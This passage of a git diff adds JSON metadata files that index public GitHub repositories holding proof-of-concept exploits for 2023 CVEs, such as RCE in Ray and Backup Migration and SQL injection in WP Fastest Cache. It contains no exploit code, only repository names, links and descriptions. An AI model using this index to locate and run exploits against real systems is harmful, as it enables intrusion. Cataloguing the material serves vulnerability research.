"public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209627, + "name": "CVE-2023-5720-3", + "full_name": "miguelc49\/CVE-2023-5720-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-5720-3", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:39Z", + "updated_at": "2024-04-14T17:41:26Z", + "pushed_at": "2024-04-15T20:00:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5808.json b/2023/CVE-2023-5808.json new file mode 100644 index 0000000000..f29bd37664 --- /dev/null +++ b/2023/CVE-2023-5808.json @@ -0,0 +1,33 @@ +[ + { + "id": 732971718, + "name": "CVE-2023-5808", + "full_name": "Arszilla\/CVE-2023-5808", + "owner": { + "login": "Arszilla", + "id": 22989170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22989170?v=4", + "html_url": "https:\/\/github.com\/Arszilla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arszilla\/CVE-2023-5808", + "description": null, + "fork": false, + "created_at": "2023-12-18T09:24:14Z", + "updated_at": "2023-12-18T09:24:20Z", + "pushed_at": "2023-12-18T09:24:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5961.json b/2023/CVE-2023-5961.json new file mode 100644 index 0000000000..75167e2c6d --- /dev/null +++ b/2023/CVE-2023-5961.json @@ -0,0 +1,33 @@ +[ + { + "id": 750906260, + "name": "CVE-2023-5961", + "full_name": "HadessCS\/CVE-2023-5961", + "owner": { + "login": "HadessCS", + "id": 102136070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102136070?v=4", + "html_url": "https:\/\/github.com\/HadessCS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HadessCS\/CVE-2023-5961", + "description": "moxa ioLogik E1212", + "fork": false, + "created_at": "2024-01-31T15:00:16Z", + "updated_at": "2024-02-27T15:19:44Z", + "pushed_at": "2024-01-31T15:03:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5965.json b/2023/CVE-2023-5965.json new file mode 100644 index 0000000000..413c0565aa --- /dev/null +++ b/2023/CVE-2023-5965.json @@ -0,0 +1,33 @@ +[ + { + "id": 554898866, + "name": "cve-2023-5965", + "full_name": "pedrojosenavasperez\/cve-2023-5965", + "owner": { + "login": "pedrojosenavasperez", + "id": 115498883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115498883?v=4", + "html_url": "https:\/\/github.com\/pedrojosenavasperez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pedrojosenavasperez\/cve-2023-5965", + "description": null, + "fork": false, + "created_at": "2022-10-20T15:35:07Z", + "updated_at": "2023-11-13T17:27:18Z", + "pushed_at": "2023-11-13T17:26:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5966.json b/2023/CVE-2023-5966.json new file mode 100644 index 0000000000..3d5e18d153 --- /dev/null +++ b/2023/CVE-2023-5966.json @@ -0,0 +1,33 @@ +[ + { + "id": 554819475, + "name": "cve-2023-5966", + "full_name": "pedrojosenavasperez\/cve-2023-5966", + "owner": { + "login": "pedrojosenavasperez", + "id": 115498883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115498883?v=4", + "html_url": "https:\/\/github.com\/pedrojosenavasperez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pedrojosenavasperez\/cve-2023-5966", + "description": null, + "fork": false, + "created_at": "2022-10-20T13:00:10Z", + "updated_at": "2024-09-21T12:08:42Z", + "pushed_at": "2023-11-13T17:24:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6000.json b/2023/CVE-2023-6000.json new file mode 100644 index 0000000000..1a3e247973 --- /dev/null +++ b/2023/CVE-2023-6000.json @@ -0,0 +1,33 @@ +[ + { + "id": 872483237, + "name": "CVE-2023-6000-POC", + "full_name": "RonF98\/CVE-2023-6000-POC", + "owner": { + "login": "RonF98", + "id": 181740430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181740430?v=4", + "html_url": "https:\/\/github.com\/RonF98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RonF98\/CVE-2023-6000-POC", + "description": "This vulnerability displays an XSS flaw in a WordPress popup plugin, allowing attackers to inject malicious JavaScript through a stored XSS", + "fork": false, + "created_at": "2024-10-14T14:11:02Z", + "updated_at": "2024-11-25T09:53:43Z", + "pushed_at": "2024-10-15T13:55:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6019.json b/2023/CVE-2023-6019.json new file mode 100644 index 0000000000..42d677a45a --- /dev/null +++ b/2023/CVE-2023-6019.json @@ -0,0 +1,157 @@ +[ + { + "id": 784652268, + "name": "CVE-2023-6019", + "full_name": "FireWolfWang\/CVE-2023-6019", + "owner": { + "login": "FireWolfWang", + "id": 33483801, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33483801?v=4", + "html_url": "https:\/\/github.com\/FireWolfWang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FireWolfWang\/CVE-2023-6019", + "description": "Ray OS Command Injection RCE(Unauthorized)", + "fork": false, + "created_at": "2024-04-10T09:24:06Z", + "updated_at": "2024-04-11T13:50:19Z", + "pushed_at": "2024-04-10T09:28:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209900, + "name": "CVE-2023-6019-2", + "full_name": "miguelc49\/CVE-2023-6019-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-6019-2", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:44Z", + "updated_at": "2024-04-14T17:41:33Z", + "pushed_at": "2024-04-14T17:41:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209916, + "name": "CVE-2023-6019-1", + "full_name": "miguelc49\/CVE-2023-6019-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-6019-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:49Z", + "updated_at": "2024-04-14T17:41:29Z", + "pushed_at": "2024-04-14T17:41:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786353747, + "name": "CVE-2023-6019-3", + "full_name": "miguelc49\/CVE-2023-6019-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-6019-3", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:35:11Z", + "updated_at": "2024-04-14T17:41:39Z", + "pushed_at": "2024-04-14T17:41:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789777022, + "name": "CVE-2023-6019", + "full_name": "Clydeston\/CVE-2023-6019", + "owner": { + "login": "Clydeston", + "id": 47860813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47860813?v=4", + "html_url": "https:\/\/github.com\/Clydeston", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Clydeston\/CVE-2023-6019", + "description": "Python POC for CVE-2023-6019 taken from https:\/\/huntr.com\/bounties\/d0290f3c-b302-4161-89f2-c13bb28b4cfe", + "fork": false, + "created_at": "2024-04-21T14:30:28Z", + "updated_at": "2024-06-10T16:37:07Z", + "pushed_at": "2024-04-21T14:32:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6036.json b/2023/CVE-2023-6036.json new file mode 100644 index 0000000000..b65d5ce93e --- /dev/null +++ b/2023/CVE-2023-6036.json @@ -0,0 +1,33 @@ +[ + { + "id": 750960186, + "name": "CVE-2023-6036", + "full_name": "pctripsesp\/CVE-2023-6036", + "owner": { + "login": "pctripsesp", + "id": 17095580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17095580?v=4", + "html_url": "https:\/\/github.com\/pctripsesp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pctripsesp\/CVE-2023-6036", + "description": "POC about Web3 – Crypto wallet Login & NFT token gating < 3.0.0 - Authentication Bypass Wordpress plugin", + "fork": false, + "created_at": "2024-01-31T16:58:48Z", + "updated_at": "2024-02-01T14:21:59Z", + "pushed_at": "2024-01-31T17:42:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6063.json b/2023/CVE-2023-6063.json new file mode 100644 index 0000000000..1453a631d5 --- /dev/null +++ b/2023/CVE-2023-6063.json @@ -0,0 +1,95 @@ +[ + { + "id": 719146234, + "name": "CVE-2023-6063-PoC", + "full_name": "motikan2010\/CVE-2023-6063-PoC", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2023-6063-PoC", + "description": "CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)", + "fork": false, + "created_at": "2023-11-15T14:53:03Z", + "updated_at": "2024-06-26T12:02:24Z", + "pushed_at": "2023-11-15T14:53:48Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719663902, + "name": "CVE-2023-6063-PoC", + "full_name": "hackersroot\/CVE-2023-6063-PoC", + "owner": { + "login": "hackersroot", + "id": 128667885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128667885?v=4", + "html_url": "https:\/\/github.com\/hackersroot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackersroot\/CVE-2023-6063-PoC", + "description": "Exploiting SQL Injection Vulnerability in WP Fastest Cache (CVE-2023-6063)", + "fork": false, + "created_at": "2023-11-16T16:36:44Z", + "updated_at": "2023-11-16T16:36:45Z", + "pushed_at": "2023-11-16T16:41:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719689698, + "name": "CVE-2023-6063", + "full_name": "thesafdari\/CVE-2023-6063", + "owner": { + "login": "thesafdari", + "id": 122823051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122823051?v=4", + "html_url": "https:\/\/github.com\/thesafdari", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thesafdari\/CVE-2023-6063", + "description": "CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)", + "fork": false, + "created_at": "2023-11-16T17:41:59Z", + "updated_at": "2024-11-20T21:28:27Z", + "pushed_at": "2023-11-16T17:44:39Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6241.json b/2023/CVE-2023-6241.json new file mode 100644 index 0000000000..ba7798c1da --- /dev/null +++ b/2023/CVE-2023-6241.json @@ -0,0 +1,42 @@ +[ + { + "id": 794812900, + "name": "CVE-2023-6241", + "full_name": "s1204IT\/CVE-2023-6241", + "owner": { + "login": "s1204IT", + "id": 52069677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52069677?v=4", + "html_url": "https:\/\/github.com\/s1204IT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s1204IT\/CVE-2023-6241", + "description": "CVE-2023-6241 for Pixel 8", + "fork": false, + "created_at": "2024-05-02T02:17:31Z", + "updated_at": "2024-11-19T16:35:45Z", + "pushed_at": "2024-10-17T19:39:45Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [ + "android", + "android-14", + "arm", + "google", + "mali", + "pixel", + "pixel8", + "poc" + ], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6246.json b/2023/CVE-2023-6246.json new file mode 100644 index 0000000000..f6e0a81554 --- /dev/null +++ b/2023/CVE-2023-6246.json @@ -0,0 +1,33 @@ +[ + { + "id": 766195734, + "name": "CVE-2023-6246", + "full_name": "elpe-pinillo\/CVE-2023-6246", + "owner": { + "login": "elpe-pinillo", + "id": 30589235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30589235?v=4", + "html_url": "https:\/\/github.com\/elpe-pinillo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elpe-pinillo\/CVE-2023-6246", + "description": null, + "fork": false, + "created_at": "2024-03-02T15:45:52Z", + "updated_at": "2024-07-02T01:24:45Z", + "pushed_at": "2024-03-06T20:12:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6275.json b/2023/CVE-2023-6275.json new file mode 100644 index 0000000000..c27f6ca648 --- /dev/null +++ b/2023/CVE-2023-6275.json @@ -0,0 +1,33 @@ +[ + { + "id": 851979196, + "name": "CVE-2023-6275", + "full_name": "erickfernandox\/CVE-2023-6275", + "owner": { + "login": "erickfernandox", + "id": 2186082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2186082?v=4", + "html_url": "https:\/\/github.com\/erickfernandox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erickfernandox\/CVE-2023-6275", + "description": "Reflected Cross-Site Scripting in TOTVS Fluig Plataform 1.6.X - 1.8.1", + "fork": false, + "created_at": "2024-09-04T02:33:46Z", + "updated_at": "2024-10-01T14:04:30Z", + "pushed_at": "2024-09-17T15:08:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6289.json b/2023/CVE-2023-6289.json new file mode 100644 index 0000000000..92a1017637 --- /dev/null +++ b/2023/CVE-2023-6289.json @@ -0,0 +1,33 @@ +[ + { + "id": 724794135, + "name": "CVE-2023-6289", + "full_name": "RandomRobbieBF\/CVE-2023-6289", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6289", + "description": "Swift Performance Lite <= 2.3.6.14 - Missing Authorization to Unauthenticated Settings Export", + "fork": false, + "created_at": "2023-11-28T20:05:43Z", + "updated_at": "2023-11-28T20:05:44Z", + "pushed_at": "2023-11-28T20:07:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6319.json b/2023/CVE-2023-6319.json new file mode 100644 index 0000000000..302d9daaea --- /dev/null +++ b/2023/CVE-2023-6319.json @@ -0,0 +1,38 @@ +[ + { + "id": 785372711, + "name": "root-my-webos-tv", + "full_name": "illixion\/root-my-webos-tv", + "owner": { + "login": "illixion", + "id": 14954655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14954655?v=4", + "html_url": "https:\/\/github.com\/illixion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/illixion\/root-my-webos-tv", + "description": "CVE-2023-6319 proof of concept", + "fork": false, + "created_at": "2024-04-11T18:58:17Z", + "updated_at": "2024-11-23T12:46:38Z", + "pushed_at": "2024-10-17T11:18:46Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-6319", + "exploit", + "tv", + "webos" + ], + "visibility": "public", + "forks": 4, + "watchers": 36, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6350.json b/2023/CVE-2023-6350.json new file mode 100644 index 0000000000..1013f1a49e --- /dev/null +++ b/2023/CVE-2023-6350.json @@ -0,0 +1,33 @@ +[ + { + "id": 864923088, + "name": "CVE-2023-6350_Reproduction", + "full_name": "dywsy21\/CVE-2023-6350_Reproduction", + "owner": { + "login": "dywsy21", + "id": 150417245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150417245?v=4", + "html_url": "https:\/\/github.com\/dywsy21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dywsy21\/CVE-2023-6350_Reproduction", + "description": null, + "fork": false, + "created_at": "2024-09-29T14:29:26Z", + "updated_at": "2024-10-17T12:09:18Z", + "pushed_at": "2024-10-17T12:09:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6421.json b/2023/CVE-2023-6421.json new file mode 100644 index 0000000000..5f7967239b --- /dev/null +++ b/2023/CVE-2023-6421.json @@ -0,0 +1,33 @@ +[ + { + "id": 870113743, + "name": "CVE-2023-6421", + "full_name": "RandomRobbieBF\/CVE-2023-6421", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6421", + "description": "Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak", + "fork": false, + "created_at": "2024-10-09T13:18:10Z", + "updated_at": "2024-10-18T17:57:25Z", + "pushed_at": "2024-10-09T13:20:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6444.json b/2023/CVE-2023-6444.json new file mode 100644 index 0000000000..6a56f3d239 --- /dev/null +++ b/2023/CVE-2023-6444.json @@ -0,0 +1,33 @@ +[ + { + "id": 839110924, + "name": "CVE-2023-6444-POC", + "full_name": "Wayne-Ker\/CVE-2023-6444-POC", + "owner": { + "login": "Wayne-Ker", + "id": 94828747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94828747?v=4", + "html_url": "https:\/\/github.com\/Wayne-Ker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wayne-Ker\/CVE-2023-6444-POC", + "description": "Proof of concept on Unauthenticated Administrator Email Disclosure CVE-2023-6444", + "fork": false, + "created_at": "2024-08-07T01:58:04Z", + "updated_at": "2024-08-07T02:23:47Z", + "pushed_at": "2024-08-07T02:23:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6538.json b/2023/CVE-2023-6538.json new file mode 100644 index 0000000000..431ce288cc --- /dev/null +++ b/2023/CVE-2023-6538.json @@ -0,0 +1,33 @@ +[ + { + "id": 732973718, + "name": "CVE-2023-6538", + "full_name": "Arszilla\/CVE-2023-6538", + "owner": { + "login": "Arszilla", + "id": 22989170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22989170?v=4", + "html_url": "https:\/\/github.com\/Arszilla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arszilla\/CVE-2023-6538", + "description": null, + "fork": false, + "created_at": "2023-12-18T09:29:42Z", + "updated_at": "2023-12-18T09:29:48Z", + "pushed_at": "2023-12-18T09:29:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6553.json b/2023/CVE-2023-6553.json new file mode 100644 index 0000000000..5d7ef68260 --- /dev/null +++ b/2023/CVE-2023-6553.json @@ -0,0 +1,171 @@ +[ + { + "id": 731322134, + "name": "CVE-2023-6553", + "full_name": "Chocapikk\/CVE-2023-6553", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-6553", + "description": "Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution", + "fork": false, + "created_at": "2023-12-13T20:26:59Z", + "updated_at": "2024-11-10T09:46:48Z", + "pushed_at": "2024-02-06T23:22:31Z", + "stargazers_count": 72, + "watchers_count": 72, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-6553", + "cybersecurity", + "exploit", + "hacking", + "infosec", + "php", + "python", + "rce", + "security", + "security-research", + "vulnerability", + "wordpress" + ], + "visibility": "public", + "forks": 23, + "watchers": 72, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 736295988, + "name": "CVE-2023-6553-PoC", + "full_name": "motikan2010\/CVE-2023-6553-PoC", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2023-6553-PoC", + "description": null, + "fork": false, + "created_at": "2023-12-27T14:14:51Z", + "updated_at": "2024-06-26T12:02:15Z", + "pushed_at": "2023-12-27T14:16:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737831693, + "name": "CVE-2023-6553", + "full_name": "kiddenta\/CVE-2023-6553", + "owner": { + "login": "kiddenta", + "id": 128315553, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128315553?v=4", + "html_url": "https:\/\/github.com\/kiddenta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kiddenta\/CVE-2023-6553", + "description": null, + "fork": false, + "created_at": "2024-01-01T16:57:17Z", + "updated_at": "2024-05-11T07:09:14Z", + "pushed_at": "2024-05-11T07:09:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821866509, + "name": "CVE-2023-6553", + "full_name": "cc3305\/CVE-2023-6553", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2023-6553", + "description": "CVE-2023-6553 exploit script", + "fork": false, + "created_at": "2024-06-29T17:01:51Z", + "updated_at": "2024-07-27T20:20:42Z", + "pushed_at": "2024-07-27T20:20:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884598540, + "name": "CVE-2023-6553", + "full_name": "Harshit-Mashru\/CVE-2023-6553", + "owner": { + "login": "Harshit-Mashru", + "id": 31271975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31271975?v=4", + "html_url": "https:\/\/github.com\/Harshit-Mashru", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Harshit-Mashru\/CVE-2023-6553", + "description": "Exploit Development for CVE-2023-6553 on Backup Plugin in Wordpress", + "fork": false, + "created_at": "2024-11-07T03:28:02Z", + "updated_at": "2024-11-07T17:24:08Z", + "pushed_at": "2024-11-07T17:24:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6567.json b/2023/CVE-2023-6567.json new file mode 100644 index 0000000000..8e3efaa9a9 --- /dev/null +++ b/2023/CVE-2023-6567.json @@ -0,0 +1,33 @@ +[ + { + "id": 741790431, + "name": "CVE-2023-6567-poc", + "full_name": "mimiloveexe\/CVE-2023-6567-poc", + "owner": { + "login": "mimiloveexe", + "id": 65785929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65785929?v=4", + "html_url": "https:\/\/github.com\/mimiloveexe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mimiloveexe\/CVE-2023-6567-poc", + "description": 